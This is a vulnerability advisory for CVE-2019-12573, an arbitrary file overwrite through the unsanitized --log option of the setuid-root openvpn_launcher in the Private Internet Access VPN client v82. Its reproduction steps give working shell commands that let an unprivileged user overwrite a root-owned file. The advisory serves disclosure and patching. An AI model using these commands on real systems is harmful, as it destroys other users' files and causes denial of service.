ASA-2019-00379 – London Trust Media Private Internet Access: Arbitrary File Overwrite


Allele Security Alert

ASA-2019-00379

Identifier(s)

ASA-2019-00379, CVE-2019-12573

Title

Arbitrary File Overwrite

Vendor(s)

London Trust Media Private

Product(s)

Private Internet Access (PIA) VPN Client for Linux and macOS

Affected version(s)

Private Internet Access (PIA) VPN Client for Linux and macOS version v82

Fixed version(s)

Private Internet Access (PIA) VPN Client for Linux and macOS v1.2.1 or later

Proof of concept

Unknown

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux and macOS could allow an authenticated, local attacker to overwrite arbitrary files.

Technical details

The PIA Linux and macOS openvpn_launcher binary is setuid root. This binary supports the –log option which accepts a path as an argument. The –log parameter is not sanitized which allows a local unprivileged to overwrite arbitrary files owned by any user on the system, including root. This creates a denial of service condition and possible data loss if leveraged by a malicious local user.

Steps to reproduce

Step 1 – Create a root owned test file. For this PoC /etc/test.txt is used.

# As root
echo "this is a test" > /etc/test.txt
chmod 600 /etc/test.txt

Step 2 – Overwrite the file using the –log option using a non privileged user.

# macOS
/Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher --log /etc/test.txt

# Linux
/opt/pia/openvpn_launcher.64 --log /etc/test.txt

Step 3 – Verify the file contents have been overwritten

# As root
cat /etc/test.txt

Credits

Rich Mirch

Reference(s)

PIA Linux, macOS Arbitrary File Overwrite
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12573.txt

CVE-2019-12573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12573

CVE-2019-12573
https://nvd.nist.gov/vuln/detail/CVE-2019-12573

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: June 25, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.